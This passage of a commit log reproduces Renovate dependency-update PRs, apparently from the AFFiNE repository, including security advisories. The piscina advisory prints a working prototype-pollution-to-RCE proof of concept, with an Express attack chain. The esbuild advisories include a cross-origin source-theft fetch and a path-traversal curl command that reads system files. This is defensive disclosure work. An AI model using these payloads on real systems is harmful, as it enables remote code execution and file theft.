[@​chimurai](https://redirect.github.com/chimurai) in [#​1144](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1144) - build(eslint): update eslint.config.mjs by [@​chimurai](https://redirect.github.com/chimurai) in [#​1145](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1145) - ci(github workflow): harden github workflows by [@​chimurai](https://redirect.github.com/chimurai) in [#​1146](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1146) - chore(package): bump dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1147](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1147) - ci(ci.yml): unpin node 24 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1148](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1148) - docs(recipes): fix servers.md http.createServer example by [@​hacklschorsch](https://redirect.github.com/hacklschorsch) in [#​1150](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1150) - ci: publish with oidc by [@​chimurai](https://redirect.github.com/chimurai) in [#​1152](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1152) - chore(package.json): bump dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1153](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1153) - chore(package.json): bump dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1155](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1155) - chore(package.json): bump dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1158](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1158) - test(types.spec.ts): add type check when req or res are 'any' by [@​chimurai](https://redirect.github.com/chimurai) in [#​1161](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1161) - chore(package.json): bump deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1164](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1164) - chore(package.json): eslint v10 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1165](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1165) - chore(package.json): bump dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1166](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1166) - chore(package.json): bump dev-deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1171](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1171) - docs(examples): fix websocket example by [@​chimurai](https://redirect.github.com/chimurai) in [#​1170](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1170) - build(vscode): use workspace version of TypeScript by [@​chimurai](https://redirect.github.com/chimurai) in [#​1173](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1173) - fix(router): harden proxy-table matching by [@​chimurai](https://redirect.github.com/chimurai) in [#​1254](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1254) - chore(package.json): v3.0.6 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1256](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1256) #### New Contributors - [@​knudtty](https://redirect.github.com/knudtty) made their first contribution in [#​1103](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1103) - [@​DEBargha2004](https://redirect.github.com/DEBargha2004) made their first contribution in [#​1135](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1135) - [@​hacklschorsch](https://redirect.github.com/hacklschorsch) made their first contribution in [#​1150](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1150) **Full Changelog**: <https://github.com/chimurai/http-proxy-middleware/compare/v3.0.5...v3.0.6> </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
9a9f243966 |
chore: bump up piscina version to v5.2.0 [SECURITY] (#15132)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [piscina](https://redirect.github.com/piscinajs/piscina) | [`5.1.4` → `5.2.0`](https://renovatebot.com/diffs/npm/piscina/5.1.4/5.2.0) |  |  | --- ### piscina: Prototype Pollution Gadget → RCE via inherited options.filename [CVE-2026-55388](https://nvd.nist.gov/vuln/detail/CVE-2026-55388) / [GHSA-x9g3-xrwr-cwfg](https://redirect.github.com/advisories/GHSA-x9g3-xrwr-cwfg) <details> <summary>More information</summary> #### Details ##### Summary `piscina`'s constructor and `run()` paths read the `filename` option via plain member access: ```js // dist/index.js line 92 (constructor) const filename = options.filename ? (0, common_1.maybeFileURLToPath)(options.filename) : null; this.options = { ...kDefaultOptions, ...options, filename, maxQueue: 0 }; // dist/index.js line 616 (run()) run(task, options = kDefaultRunOptions) { if (options === null || typeof options !== 'object') { return Promise.reject(new TypeError('options must be an object')); } const { transferList, filename, name, signal } = options; ``` Both reads fall through the prototype chain when the caller's options object doesn't have `filename` as an own property. When `Object.prototype.filename` is polluted upstream — by any of the well-documented PP-source CVEs (lodash<4.17.13, qs<6.10.3, set-value<4.1.0, minimist<1.2.6, deepmerge<4.2.2, and others) — the inherited value flows to `worker_threads.Worker` import and the attacker's `.mjs` runs in the worker. **Subtlety**: calling `pool.run(task)` with no second arg uses `kDefaultRunOptions` which has `filename: null` as an OWN property — that path DOES NOT fire. The vulnerable shape is when the caller passes their own options object (commonly `{signal: ac.signal}` for abort support, `{name: ...}` for task labelling, etc.). These caller-built options objects inherit from `Object.prototype` unless the caller explicitly uses `Object.create(null)`. ##### Impact Two preconditions: 1. **Upstream PP-source** somewhere in the process — common in transitive deps 2. **Attacker-controllable `.mjs`** at a known filesystem path — realistic via upload endpoints, /tmp races, predictable node_modules paths, or supply-chain Once both fire: - Every `pool.run(task, opts)` call across the entire process is hijacked - Attacker's exported function is called with the legitimate caller's task data — **attacker reads per-request app data** - Attacker controls the return value — caller receives `worker_response.by = "ATTACKER-WORKER"` and any other attacker-supplied response fields — **attacker can poison return values to legitimate clients** - Hijack persists until process restart Strictly worse than the analogous pino chain because piscina actually *invokes* the attacker function with caller data on every dispatch (pino imports the attacker module once and errors out). ##### Affected versions Empirically verified vulnerable on `piscina@5.1.4` (latest stable at time of disclosure). The bug shape is in the constructor's `options.filename` read at line 92 of `dist/index.js`, present since the worker-pool API stabilized — likely all 3.x / 4.x / 5.x affected. ##### Proof of concept ##### A) Minimal in-process PoC ```js import fs from 'fs'; // 1) Drop the attacker module (any path the victim process can read) fs.writeFileSync('/tmp/atk.mjs', ` import fs from 'fs'; fs.writeFileSync('/tmp/PISCINA_RCE_SENTINEL', JSON.stringify({ rce: 'CONFIRMED', pid: process.pid, argv1: process.argv[1], })); export default function(arg) { return 'attacker-return-' + JSON.stringify(arg); } `); // 2) Upstream PP-source — pollute Object.prototype.filename // (representative of CVE-2019-10744 lodash<4.17.13, CVE-2022-24999 qs<6.10.3, // and ~30 historical PP-source CVEs) const payload = JSON.parse('{"__proto__":{"filename":"/tmp/atk.mjs"}}'); function vulnMerge(t, s) { for (const k of Object.keys(s)) { if (s[k] !== null && typeof s[k] === 'object') { if (!t[k]) t[k] = {}; vulnMerge(t[k], s[k]); } else t[k] = s[k]; } } vulnMerge({}, payload); // 3) Piscina with empty options inherits the polluted filename const { Piscina } = await import('piscina'); const p = new Piscina({}); // inherits filename const result = await p.run({}); // worker imports /tmp/atk.mjs await p.destroy(); // 4) sentinel exists; attacker fn was called with task data console.log(fs.readFileSync('/tmp/PISCINA_RCE_SENTINEL', 'utf8')); console.log('attacker fn returned:', result); // → "attacker-return-{}" ``` ##### B) Full-stack HTTP chain (this is the realistic shape) A correctly-initialized pool gets hijacked by attacker activity. Pool is created at server boot with a legitimate worker, then per-request handlers call `pool.run(req.body, {signal: ac.signal})` — the standard abort-aware shape. ```js // === server.mjs === import express from 'express'; import { Piscina } from 'piscina'; // Vulnerable PP-source middleware (lodash<4.17.13 equivalent) function vulnMerge(t, s) { for (const k of Object.keys(s)) { if (s[k] !== null && typeof s[k] === 'object') { if (!t[k]) t[k] = {}; vulnMerge(t[k], s[k]); } else t[k] = s[k]; } } // CORRECT pool init at boot const pool = new Piscina({ filename: './valid-worker.mjs', minThreads: 1, maxThreads: 2, }); const config = {}; const app = express(); app.post('/api/settings', express.json(), (req, res) => { vulnMerge(config, req.body); // PP source res.json({ ok: true }); }); app.post('/api/process', express.json(), async (req, res) => { const ac = new AbortController(); const result = await pool.run(req.body, { signal: ac.signal }); // <-- hijacked res.json({ ok: true, worker_response: result }); }); app.listen(7755); // === Attacker, 3 HTTP requests === // POST /upload → drops /tmp/atk.mjs // POST /api/settings with body: {"__proto__":{"filename":"/tmp/atk.mjs"}} // POST /api/process → pool.run() destructures filename via prototype // → worker imports /tmp/atk.mjs // → attacker fn called with req.body of THIS request // → caller receives attacker-shaped response ``` Empirical observation on `piscina@5.1.4` + Node 23.11.0: - Pre-attack `/api/process` returns `{by: 'valid-worker'}` - Cold-path `/probe` after PP source confirms `({}).filename` is polluted process-wide - Post-attack `/api/process` returns `{by: 'ATTACKER-WORKER', processed: <caller's exfil data>}` - Sentinel file written from inside `piscina/dist/worker.js` with the worker process's uid + env access ##### Recommended fix Minimal — own-property guard at both option-read sites: ```js // constructor (line 92) const userFilename = Object.prototype.hasOwnProperty.call(options, 'filename') ? options.filename : null; const filename = userFilename ? (0, common_1.maybeFileURLToPath)(userFilename) : null; // run() (line 616) const safeOpts = Object.create(null); Object.assign(safeOpts, options); // copies own props only? — keeps shape const { transferList, filename, name, signal } = safeOpts; ``` More idiomatic — use a null-prototype working object throughout `this.options`: ```js const safeOpts = Object.create(null); Object.assign(safeOpts, kDefaultOptions, options); this.options = safeOpts; this.options.filename = safeOpts.filename ? (0, common_1.maybeFileURLToPath)(safeOpts.filename) : null; this.options.maxQueue = 0; ``` Either approach closes the gadget without breaking any legitimate caller pattern. The pattern is the same as recommended for axios CVE-2026-44494 and the pino PSA filed earlier today. Cross-fix consideration: any other library you maintain that uses similar `options.X` member-access for worker / child-process / module-load operations is worth a quick audit. ##### Coordination - Same maintainer as pino — you're already in security-triage mode for that PSA. Happy to coordinate timing / disclosure dates across both. - Will not share publicly until GHSA published or 90 days. - Please credit `ridingsa` if you choose to credit a reporter. ##### How this was discovered Generalized the pino disclosure's mechanism — any library that reads a string option via plain member access and dynamic-loads it (via `import()` / `require()` / `new Worker()`) is a candidate. Ran a sweep across 10 candidate libraries; piscina + fastify (via pino propagation) fired. Piscina is independently vulnerable through its own option-read sites, hence this separate disclosure. #### Severity - CVSS Score: 8.1 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H` #### References - [https://github.com/piscinajs/piscina/security/advisories/GHSA-x9g3-xrwr-cwfg](https://redirect.github.com/piscinajs/piscina/security/advisories/GHSA-x9g3-xrwr-cwfg) - [https://github.com/advisories/GHSA-x9g3-xrwr-cwfg](https://redirect.github.com/advisories/GHSA-x9g3-xrwr-cwfg) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-x9g3-xrwr-cwfg) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>piscinajs/piscina (piscina)</summary> ### [`v5.2.0`](https://redirect.github.com/piscinajs/piscina/compare/v5.1.4...v5.2.0) [Compare Source](https://redirect.github.com/piscinajs/piscina/compare/v5.1.4...v5.2.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
766219d4e1 |
chore: bump up nestjs to v11.1.27 (#15130)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@nestjs/common](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common)) | [`11.1.24` → `11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.24/11.1.27) |  |  | | [@nestjs/core](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core)) | [`11.1.24` → `11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.24/11.1.27) |  |  | | [@nestjs/platform-express](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express)) | [`11.1.24` → `11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.24/11.1.27) |  |  | | [@nestjs/platform-socket.io](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io)) | [`11.1.24` → `11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.24/11.1.27) |  |  | | [@nestjs/websockets](https://redirect.github.com/nestjs/nest) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets)) | [`11.1.24` → `11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.24/11.1.27) |  |  | --- > [!WARNING] > Some dependencies could not be looked up. Check the [Dependency Dashboard](../issues/5188) for more information. --- ### Release Notes <details> <summary>nestjs/nest (@​nestjs/common)</summary> ### [`v11.1.27`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.27) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.26...v11.1.27) #### What's Changed - fix(core): sse async handlers teardown issue by [@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec) in [#​17131](https://redirect.github.com/nestjs/nest/pull/17131) - fix(platform-fastify): forRoutes middleware ending slash by [@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec) in [#​17138](https://redirect.github.com/nestjs/nest/pull/17138) **Full Changelog**: <https://github.com/nestjs/nest/compare/v11.1.26...v11.1.27> ### [`v11.1.26`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.26) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.25...v11.1.26) #### What's Changed - fix(core): post sse endpoint empty response [#​17098](https://redirect.github.com/nestjs/nest/issues/17098) by [@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec) in [#​17099](https://redirect.github.com/nestjs/nest/pull/17099) **Full Changelog**: <https://github.com/nestjs/nest/compare/v11.1.25...v11.1.26> ### [`v11.1.25`](https://redirect.github.com/nestjs/nest/compare/v11.1.24...02f804159841a2771755c382832a7938b904c420) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.24...v11.1.25) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about these updates again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMTkuMCIsInVwZGF0ZWRJblZlciI6IjQzLjIxOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
01d7ef88e3 |
chore: bump up esbuild version to ^0.28.0 [SECURITY] (#15128)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [esbuild](https://redirect.github.com/evanw/esbuild) | [`^0.25.12` → `^0.28.0`](https://renovatebot.com/diffs/npm/esbuild/0.25.12/0.28.1) |  |  | --- > [!WARNING] > Some dependencies could not be looked up. Check the [Dependency Dashboard](../issues/5188) for more information. --- ### esbuild enables any website to send any requests to the development server and read the response [GHSA-67mh-4wv8-2f99](https://redirect.github.com/advisories/GHSA-67mh-4wv8-2f99) <details> <summary>More information</summary> #### Details ##### Summary esbuild allows any websites to send any request to the development server and read the response due to default CORS settings. ##### Details esbuild sets `Access-Control-Allow-Origin: *` header to all requests, including the SSE connection, which allows any websites to send any request to the development server and read the response. https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L121 https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L363 **Attack scenario**: 1. The attacker serves a malicious web page (`http://malicious.example.com`). 1. The user accesses the malicious web page. 1. The attacker sends a `fetch('http://127.0.0.1:8000/main.js')` request by JS in that malicious web page. This request is normally blocked by same-origin policy, but that's not the case for the reasons above. 1. The attacker gets the content of `http://127.0.0.1:8000/main.js`. In this scenario, I assumed that the attacker knows the URL of the bundle output file name. But the attacker can also get that information by - Fetching `/index.html`: normally you have a script tag here - Fetching `/assets`: it's common to have a `assets` directory when you have JS files and CSS files in a different directory and the directory listing feature tells the attacker the list of files - Connecting `/esbuild` SSE endpoint: the SSE endpoint sends the URL path of the changed files when the file is changed (`new EventSource('/esbuild').addEventListener('change', e => console.log(e.type, e.data))`) - Fetching URLs in the known file: once the attacker knows one file, the attacker can know the URLs imported from that file The scenario above fetches the compiled content, but if the victim has the source map option enabled, the attacker can also get the non-compiled content by fetching the source map file. ##### PoC 1. Download [reproduction.zip](https://redirect.github.com/user-attachments/files/18561484/reproduction.zip) 2. Extract it and move to that directory 1. Run `npm i` 1. Run `npm run watch` 1. Run `fetch('http://127.0.0.1:8000/app.js').then(r => r.text()).then(content => console.log(content))` in a different website's dev tools.  ##### Impact Users using the serve feature may get the source code stolen by malicious websites. #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N` #### References - [https://github.com/evanw/esbuild/security/advisories/GHSA-67mh-4wv8-2f99](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-67mh-4wv8-2f99) - [https://github.com/evanw/esbuild/commit/de85afd65edec9ebc44a11e245fd9e9a2e99760d](https://redirect.github.com/evanw/esbuild/commit/de85afd65edec9ebc44a11e245fd9e9a2e99760d) - [https://github.com/advisories/GHSA-67mh-4wv8-2f99](https://redirect.github.com/advisories/GHSA-67mh-4wv8-2f99) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-67mh-4wv8-2f99) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### esbuild allows arbitrary file read when running the development server on Windows [GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/advisories/GHSA-g7r4-m6w7-qqqr) <details> <summary>More information</summary> #### Details ##### Summary The development server contains a path traversal vulnerability on Windows when serving files from `servedir`. Due to the use of `path.Clean()` (which only normalizes forward-slash `/` separators) instead of a Windows-aware path normalization function, it is possible to craft requests using backslashes (`\`) that bypass the intended directory containment logic. An attacker can escape the configured `servedir` root and access arbitrary files on the filesystem. This issue affects Windows environments only. ##### Details The request path is sanitized using: ```go // https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L165 queryPath := path.Clean(req.URL.Path)[1:] ``` However: - `path.Clean()` is POSIX-style and only understands `/` (docs: `https://pkg.go.dev/path#Clean`) - On Windows, `\` is a valid path separator - `path.Clean()` does not treat `\` as a separator Later, the server constructs the absolute path: ```go // https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L221 absPath := h.fs.Join(h.servedir, queryPath) ``` If `queryPath` contains sequences such as: ``` ..\..\..\..\..\..\..\Windows\system.ini ``` `path.Clean()` will not normalize them, but the Windows filesystem will interpret `\` as directory separators when resolving `absPath`. Because the implementation does not verify that the final resolved path remains within `servedir`, it allows directory traversal outside the intended root directory. ##### Vulnerable Code ```go // https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L165 queryPath := path.Clean(req.URL.Path)[1:] .... // Check for a file in the "servedir" directory if h.servedir != "" && kind != fs.FileEntry { absPath := h.fs.Join(h.servedir, queryPath) if absDir := h.fs.Dir(absPath); absDir != absPath { if entries, err, _ := h.fs.ReadDirectory(absDir); err == nil { if entry, _ := entries.Get(h.fs.Base(absPath)); entry != nil && entry.Kind(h.fs) == fs.FileEntry { .... ``` ##### Steps to reproduce ``` npm install --save-exact --save-dev esbuild echo "console.log(1)" > app.js .\node_modules\.bin\esbuild --version 0.27.3 .\node_modules\.bin\esbuild app.js --bundle --outdir=www --servedir=www --watch curl -i --path-as-is "http://localhost:8000/..\..\..\..\..\..\..\Windows\system.ini" <content of Windows\system.ini> ``` ##### Impact - Arbitrary file read on Windows - Exposure of sensitive files #### Severity - CVSS Score: 2.5 / 10 (Low) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N` #### References - [https://github.com/evanw/esbuild/security/advisories/GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-g7r4-m6w7-qqqr) - [https://github.com/evanw/esbuild/releases/tag/v0.28.1](https://redirect.github.com/evanw/esbuild/releases/tag/v0.28.1) - [https://github.com/advisories/GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/advisories/GHSA-g7r4-m6w7-qqqr) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-g7r4-m6w7-qqqr) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>evanw/esbuild (esbuild)</summary> ### [`v0.28.1`](https://redirect.github.com/evanw/esbuild/blob/HEAD/CHANGELOG.md#0281) [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.28.0...v0.28.1) - Disallow `\\` in local development server HTTP requests ([GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-g7r4-m6w7-qqqr)) This release fixes a security issue where HTTP requests to esbuild's local development server could traverse outside of the serve directory on Windows using a `\\` backslash character. It happened due to the use of Go's `path.Clean()` function, which only handles Unix-style `/` characters. HTTP requests with paths containing `\\` are no longer allowed. Thanks to [@​dellalibera](https://redirect.github.com/dellalibera) for reporting this issue. - Add integrity checks to the Deno API ([GHSA-gv7w-rqvm-qjhr](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-gv7w-rqvm-qjhr)) The previous release of esbuild added integrity checks to esbuild's npm install script. This release also adds integrity checks to esbuild's Deno install script. Now esbuild's Deno API will also fail with an error if the downloaded esbuild binary contains something other than the expected content. Note that esbuild's Deno API installs from `registry.npmjs.org` by default, but allows the `NPM_CONFIG_REGISTRY` environment variable to override this with a custom package registry. This change means that the esbuild executable served by `NPM_CONFIG_REGISTRY` must now match the expected content. Thanks to [@​sondt99](https://redirect.github.com/sondt99) for reporting this issue. - Avoid inlining `using` and `await using` declarations ([#​4482](https://redirect.github.com/evanw/esbuild/issues/4482)) Previously esbuild's minifier sometimes incorrectly inlined `using` and `await using` declarations into subsequent uses of that declaration, which then fails to dispose of the resource correctly. This bug happened because inlining was done for `let` and `const` declarations by avoiding doing it for `var` declarations, which no longer worked when more declaration types were added. Here's an example: ```js // Original code { using x = new Resource() x.activate() } // Old output (with --minify) new Resource().activate(); // New output (with --minify) {using e=new Resource;e.activate()} ``` - Fix module evaluation when an error is thrown ([#​4461](https://redirect.github.com/evanw/esbuild/issues/4461), [#​4467](https://redirect.github.com/evanw/esbuild/pull/4467)) If an error is thrown during module evaluation, esbuild previously didn't preserve the state of the module for subsequent module references. This was observable if `import()` or `require()` is used to import a module multiple times. The thrown error is supposed to be thrown by every call to `import()` or `require()`, not just the first. With this release, esbuild will now throw the same error every time you call `import()` or `require()` on a module that throws during its evaluation. - Fix some edge cases around the `new` operator ([#​4477](https://redirect.github.com/evanw/esbuild/issues/4477)) Previously esbuild incorrectly printed certain edge cases involving complex expressions inside the target of a `new` expression (specifically an optional chain and/or a tagged template literal). The generated code for the `new` target was not correctly wrapped with parentheses, and either contained a syntax error or had different semantics. These edge cases have been fixed so that they now correctly wrap the `new` target in parentheses. Here is an example of some affected code: ```js // Original code new (foo()`bar`)() new (foo()?.bar)() // Old output new foo()`bar`(); new (foo())?.bar(); // New output new (foo())`bar`(); new (foo()?.bar)(); ``` - Fix renaming of nested `var` declarations ([#​4471](https://redirect.github.com/evanw/esbuild/issues/4471)) This release fixes a bug where `var` declarations in nested scopes that are hoisted up to module scope were not correctly being renamed during bundling. That could previously lead to name collisions when minification was disabled, which could potentially cause a behavior change. The bug has been fixed so that these hoisted declarations are now considered to be module-level symbols during the name collision avoidance pass. - Emit `var` instead of `const` for certain TypeScript-only constructs for ES5 ([#​4448](https://redirect.github.com/evanw/esbuild/issues/4448)) While esbuild doesn't generally support converting `const` to `var` for ES5 due to nested scoping rules (which is currently a build-time error), esbuild previously incorrectly converted TypeScript-only `import` assignment constructs into a `const` declaration even when targeting ES5. With this release, esbuild will now use `var` for this case instead: ```js // Original code import x = require('y') // Old output (with --target=es5) const x = require("y"); // New output (with --target=es5) var x = require("y"); ``` ### [`v0.28.0`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.7...v0.28.0) ### [`v0.27.7`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.5...v0.27.7) ### [`v0.27.5`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.4...v0.27.5) ### [`v0.27.4`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.3...v0.27.4) ### [`v0.27.3`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.2...v0.27.3) ### [`v0.27.2`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.1...v0.27.2) ### [`v0.27.1`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.0...v0.27.1) ### [`v0.27.0`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.26.0...v0.27.0) ### [`v0.26.0`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.25.12...v0.26.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMTkuMCIsInVwZGF0ZWRJblZlciI6IjQzLjIxOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
24e07f73bb |
chore: bump up capacitor-plugin-app-tracking-transparency version to v3 (#15079)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [capacitor-plugin-app-tracking-transparency](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency) | [`^2.0.5` → `^3.0.0`](https://renovatebot.com/diffs/npm/capacitor-plugin-app-tracking-transparency/2.0.5/3.0.0) |  |  | --- ### Release Notes <details> <summary>mahnuh/capacitor-plugin-app-tracking-transparency (capacitor-plugin-app-tracking-transparency)</summary> ### [`v3.0.0`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/releases/tag/v3.0.0) [Compare Source](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/compare/v2.0.5...v3.0.0) - Add support for Swift Package Manager ([#​29](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/issues/29)) [`40051d6`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/commit/40051d6) - Update README.md [`d8c4d27`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/commit/d8c4d27) *** </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no 